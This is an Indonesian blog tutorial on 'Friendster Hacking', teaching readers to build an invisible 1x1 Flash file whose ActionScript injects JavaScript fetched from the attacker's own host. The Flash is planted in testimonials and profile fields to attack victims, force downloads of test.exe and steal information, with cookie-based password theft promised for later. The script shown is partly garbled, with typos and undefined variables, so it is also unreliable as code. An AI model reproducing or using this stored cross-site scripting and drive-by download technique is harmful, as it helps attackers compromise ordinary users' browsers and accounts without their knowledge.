Setelah file fshacking.swf selesai dibentuk dan di upload dengan benar, yang perlu kita lakukan berikutnya adalah mencoba membuka Friendster kita, dan mengirimkannya sebagai salah satu contoh kepada salah seorang teman kita. Tentunya pengiriman ini harus dilakukan dengan menggunakan Testimonial, mengingat Testimonial adalah cara yang kita bahas dalam artikel kali ini.
Misalnya kita sudah mempunyai URL file *.swf seperti berikut:
http://www.website-kita.com/fshacking.swf
Alamat di atas telah menunjukkan kepada kita, sebuah URL yang mengandung swf file yang telah memiliki script untuk memaksa seorang user men-download file test.exe setelah melihat file swf tersebut. Namun bukan berarti kita akan mengirimkannya begitu saja, yang harus kita lakukan adalah melakukan embed Flash pada saat itu adalah dengan format:
Atau
Di mana http://www.website-kita.com/fshacking.swf harus diganti menjadi alamat di mana kita meng-upload Flash kita, dan Width serta Height adalah tinggin dan lebar tampilan. Jika kita tidak menyertakan gambar animasi apapun dalam Flash tersebut, butlah itu menjadi 1x1, sehingga kotak Flash putih kosong tidak akan terlihat pada saat terjadi proses menunggu. Namun bukan berarti kita harus menggunakan 1x1 seterusnya, modifikasi apapun bebas kita lakukan sesuai imajinasi masing-masing.
Setelah melakukan embed dan menyimpan Direct URL tempat file di upload, maka kita hanya perlu menekan tombol Submit untuk kemudian membuat testimonial ini terkirim langsung kepada sang korban.
Dan apabila korban melihat testimonial tersebut, tanpa mematikan penggunaan JavaScript pada Browser miliknya, maka ia akan langsung mendapatkan dirinya melakukan download sebuah file bernama test.exe.
BENTUK LAIN FLASH EXPLOIT
Penggunaan Flash memang disebut sebagai teknik pertama dalam melakukan teknik Friendster Hacking, namun bukan berarti teknik ini sudah menjadi legenda (legenda fansblogs kali yah he..he..he..). Berbagai pengembangan, dimulai dari perubahan ekstensi, script untuk melakukan penyisipan file Falsh pada testimonial maupun profile, hingga pengguanaan script pada Falsh itu sendiri menjadikan teknik ini tetap maju hingga saat ini.
Selain dikenal sebagai teknik paling pertama, dan teknik yang paling merepotkan pihak Friendster, serta paling berbahaya, teknik ini juga dikenal sebagai yang paling sulit di-patch oleh pihak Friendster. Bagaimana tidak, di saat puluhan script sudah difillter oleh pihak Friendster pada generasi awal Friendster Hacking, Flash paling pertama dapat bertahan setidaknya 5 bulan lamanya, sampai di-patch oleh pihak Friendster.
Pada artikel kali ini, kita akan kembali membahas mengenai Friendster Hacking menggunakan Falsh yang merupakan pengembangan dari Flash pertama, yaitu dengan cara mengubah script Flash yang ada di dalam file .swf tersebut.
Sebagai permulaan, tentu kita melakukan hal yang selalu kita lakukan, yaitu membuka Macromedia Falsh 8.0 (atau versi berapapun yang kita miliki), dan memilih membuka dokumen baru yang bernama Falsh Document.
Tampilannya akan terlihat seperti gambar berikut dan jangan sampai salah pilih. Pilihlah menu yang diberi kotak warna merah.
Setelah itu, lakukanlah klik kanan pada bagian layer dan pilih menu Document and Properties.
Yang kira-kira tampilannya seperti gambar berikut:
Setelah itu akan muncul kotak dengan tampilan seperti berikut:
Pada bagian ini, yang perlu kita lakukan adalah mengubah Dimensoins yang ada pada kotak tersebut yang aku beri kotak berwarna merah.
Yang kita lakukan adalah, merubah Dimensions Width dan Height yang semula Width 550 px dan Height 400 px menjadi Width 1 px dan Height 1 px sehingga akan menjadi seperi gambar berikut:
Hal ini akan mempengaruhi besarnya kotak putih yang nampak pada bagian Testimonial kita. Mengisinya dengan lebar 1 dan panjang 1 akan membuat orang tidak menyadari bahwa ada Flash yang tersisip dalam testimonial yang mereka terima pada profile mereka.
Setelah selelsai dilakukan pengaturan sesuai dengan yang kita inginkan (disarankan hanya melakukan pada lebar dan panjang dimensi saja), kliklah pada tombol OK untuk mengaplikasikan perubahan yang kita lakukan pada dimensi layer tersebut.
Jika kita melakukan pengaturan panjang dan lebar sebesar 1x1, maka kita tidak akan melihat adanya kotak lembar putih lagi pada bagian pengaturan layer tersebut, malinkan hanya sebuah titk putih.
Sesudah selesai dengan pengaturan layer, yang perlu kita lakukan saat ini adalah melakukan penambahan dua buah KeyFrame pada Flash tersebut. KeyFrame sendiri bisa dikatakan lembaran penting, dimana script kita akan dijalankan.
ANALOGI RINGAN
Tentu kita tahu bagaiman sebuah animasi dibuat, khususnya animasi yang dijadikan film kartun. Para pembuat kartun menyusun ribuan gambar yang bersambungan, yang membuat seolah-olah gambar tersebut bergerak, apabila kertasnya digerakan dengan sangat cepat. Lembaran inilah yang kita sebut sebagai Frame dalam berbagai alat pembuat animasi seperti Flash. Sedangkan Keyframe itu sendiri berarti, lembaran yang mengandung suatu hal yang lebih penting dibandingkan yang lain, dalam kasus ini adalah script yang akan dijalankan untuk mencuri informasi dari pihak korban.
Kenapa dua buah KeyFrame ? Kenapa tidak dua buah DADA
Pada dasarnya kita hanya melakukan klik kanan pada salah satu kotak yang ada pada bagian Macromedia Flash, dan kemudian memiliki Insert KeyFrame. Tempatnya tentu tidaklah penting, kita bisa membuat KeyFrame tersebut di manapun, namun apabila terlalu ke belakang, akan memakan waktu cukup lama bagi Flash untuk melakukan penjalanan script tersebut, dan bisa saja jika terlalu lama, seorang korban sudah melakukan perpindahan halaman, yang juga berarti kita tidak dapat medapatkan informasi dari mereka.
Ingat! kita memerlukan dua buah KeyFrame, oleh karena itu kita akan membuatnya. Perlu juga diingat bahwa sebuah gambar titik kehitaman akan muncul pada kotak kecil pengaturan layer tersebut jika penambahan KeyFrame berhasil dilakukan.
Setelah menyelesaikan penambahan KeyFrame, yang harus kita lakukan selanjutnya adalah mengisikan script pada bagian pengaturan Action untuk Frame tersebut.
Gambar tersebut menjelaskan bahwa kita harus menuliskan script:
Script ini kita tuliskan pada kotak pengaturan Actions pada KeyFrame ke-2 kita. Hal ini akan mengakibatkan eksekusi atau perjalanan script yang akan dilakukan pada Frame ke-5 dan berhenti pada Frame ke-9 tersebut.
Sedangkan yang harus kita tuliskan sebagai script pencuri informasinya adalah script berikut gambar:
Gambar di atas menunjukkan kita harus menuliskan script berikut:
bX = "URL";
cX = "javacsript:";
dX = "var tF=document.createElement(’’script’’);tF.type=’’text/javascript’’;tF.src=’’URL-JavaScript-Kita’’;document.getElementsByTagName(’’head’’)[0].appenChild(tF);void(0);";
eval(aX + bX)(Cx + dX);
Dimana URL-JavaScript-Kita harus kita ganti dengan alamat tempat kita menyimpan JavaScript milik kita, misalnya http://www.website-kita.com/file.js
Kita akan menyimpan script file di atas, tepat pada Frame ke-5 yang sudah kita sediakan, tentunya dengan cara klik kiri Frame ke-5 yang sudah memiliki lambang bulatan hitam, dan mengisikan script tersebut pada bagian kolom pengaturan Actions.
Setelah kita menyelesaikan semua ini, yang harus kita lakukan adalah melakukan klik pada tombol File yang ada pada bagian kiri atas tampilan program Macromedia Flash 8.0, dan melakukan pemilihan pada menu Save As yang kemudian file ini dapat kita simpan dengan menggunakan nama apapun sesuai dengan keinginan kita.
Sebenarnya ini bukanlah file yang akan kita gunakan sebagai file pencuri informasi, namun ini adalah salah satu prosedur untuk melakukan backup data, sehingga jika hasilnya tidak bekerja, kita tidak perlu melakukan semuanya lagi dari awal, namun hanya melakukan pengubahan pada file *.fla tersebut.
Setelah tersimpan dengan nama tersebut, yang harus kita lakukan adalah melakukan pengaturan untuk publikasi file animasi ini, yaitu dengan melakukan klik pada tombol File yang ada pada bagian kiri atas program dan memilih pilihan Publish Setting.
Seperti gambar berikut:
Pada bagian pengaturan publikasi ini, biasanya sebagai hasilnya akan memunculkan dua buah file, yaitu Nama_File.swf dan Nama_File.html (menurut pengaturan standar dari Macromedia Flash). Namun kita bisa mempermudah pekerjaan kita dan agar tidak bingung pada saat melakukan upload file, dengan cara melakukan pemilihan bagi program Macromedia Flash untuk tidak melakukan publikasi hasil file HTML.
Yang harus kita lakukan sangatlah mudah, tentu saja kita harus menghapus tanda cek yang ada pada bagian publikasi file HTML, dan hanya menyisakan untuk menghasilkan file SWF saja pada kolom pengaturannya.
Lihatlah pada gambar berkut:
Dan lihat gambar berikut:
Setelah kita melakukan penghapusan gambar cek tersebut pada pilihan HTML dan hanya menyisakan SWF, yang harus kita lakukan adalah melakukan klik pada tombol OK.
Harus diingat bahwa hasil apapun yang kita inginkan keluar sebagai hasil daripada pembuatan file pencuri ini tidak tertuju pada file SWF, kenyataan bahwa gambar dan ekstensi *.mov juga sering digunakan sebagai alat bantu melakukan Friendster Hacking, membuka kemungkinan lebih untuk kita pembaca sekalian untuk melakukan percobaan.
Penggunaan SWF ini adalah contoh dan bukan sebuah harga mutlak yang harus kita ikuti 100%, namun bagi para pemula, ada baiknya mengikuti petunjuk Step by Step ini dengan sesama.
Setelah kita melakukan klik pada tombol OK yang ada pada bagian kanan bawah dan berada di bagian tengah di antara tiga tombol, maka tindakan akhir daripada pembuatan file pencuri informasi ini adalah melakukan publikasi. Tidak susah, yang harus kita lakukan hanyalah melakukan klik pada tombol File di bagian kiri atas dan memilih menu Publish.
Berikut adalah gambaran yang akan terjadi di saat kita memilih menu Publish.
Setelah selesai dengan segala sesuatu yang sehubungan dengan pembuatan file *.swf ini, kita pasti sekarang sudah memiliki sebuah file swf sebagai hasilnya, apapun itu nama filenya. Pada kesempatan kali ini, aku juga akan memperlihatkan bagaimana kita bisa melakukan penyerangan dengan menggunakan hal ini, dan menunjukkan langsung bagaiman seorang korban terkena serangan.
Sebelumnya sangat baik, jika kita menyetujui beberapa hal, yaitu sebagai contoh, kita akan menggunakan nama-nama berikut sebagai URL dan nama file kita:
1. http://www.web-hosting-kita.com/fshacks.js = URL JavaScript kita
2. http://www.web-hosting-kita.com/test.swf = URL File SWF kita
Nama file yang telah kita buat adalah test.swf.
Tadi kita sudah melakukan pembuatan file Flash yang mana akan menjalankan perintah http://www.web-hosting-kita.com/fshacks.js Oleh karena itu, hal ini tidak perlu dipikirkan lagi. Namun apa yang akan kita simpan pada fshacks.js tersebut?
Sebagai contoh, kita akan menggunakan hal yang mudah terlebih dahulu, yaitu script
Script tersebut hanya akan membuka sebuah kolom peringatan pada layar Browser kita dengan pesan bertuliskan Hello, dan terdapat sebuah tombol OK di bawahnya. Memang tidak begitu penting kelihatannya, namun kita bisa saja memodifikasi file Java tersebut dengan script lain.
Setelah kita membuat file tersebut, lalumeng-upload-nya dan kemudian menyimpan script yang ada di dalam file swf kita, maka kita harus melakukan penyisipan file swf tersebut ke dalam profile kita. Kenapa tidak Testimonial? Sekarang ini bagian Testimonial penjagaannya agak ketat, sehingga yang paling mudah adalah melalui profile kita. Eits! bukan berarti dengan Testimonial tidak bisa dilakukan
Anggap kita sudah melakukan upload file swf kita, dan URL-nya adalah http://www.web-hosting-kita.com/test.swf, maka yang sekarang harus kita lakukan adalah mempersiapkan script berikut untuk memasukkan Flash ke dalam profile kita:
Setelah persiapan selesai, lakukan login ke dalam account kita dan masukanlah ke bagian pengaturan profile di mana saja kita inginkan.
Kita bisa memasukkan script tersebut pada beberapa tempat yang diantaranya adalah:
Schools (Other)
Affiliations
Hobbies and Interests
Favorite Books
Favorite Movies
Favorite Music
Favorite TV Shows
Setelah itu lakukanlah penyimpanan terhadap perubahan yang telah kita lakukan dengan menekan tombol Save yang ada pada bagian kiri bawah pada halaman tersebut. Tunggu beberapa saat, dan setelah loading selesai, artinya script kita sudah siap untuk menjalankan tugasnya.
Untuk mengetahui apakah script dan Flash yang telah kita buat tersebut bekerja dengan benar, kita harus perlakukan percobaan. Percobaan ini bisa kita lakukan dengan membuka halaman profile kita sendiri.
Munculnya tampilan kotak pesan dengan tulisan Hello berarti bukti bahwa file swf kita telah menjalankan script yang ada pada http://www.web-hosting-kita.com/fshacks.js dengan benar, sekaligus membuktikan bahwa penyisipan Flash telah berhasil.
Pengembangan Flash sebagai alat bantu yang paling banyak manfaatnya dalam melakukan tindak Friendster Hacking tidak hanya sampai di sini, beragam aksi lainnya yang tidak kalah mengerikan juga dapat kita lakukan. Seperti contohnya, melakukan pencurian Password hanya dengan bermodalkan Cookies tapi sayangnya proses ini masih sedang dalam proses untuk aku selesaikan. Jadi jika nanti sudah selesai, pasti aku akan segera membuatkan artikelnya, tunggu saja yah.
Ternyata Halaman Yang Ini Bagus Juga Untuk Di Cetak: Cetak Halaman Ini
Read More......
Labels: Category Hacking, Friendster Hacking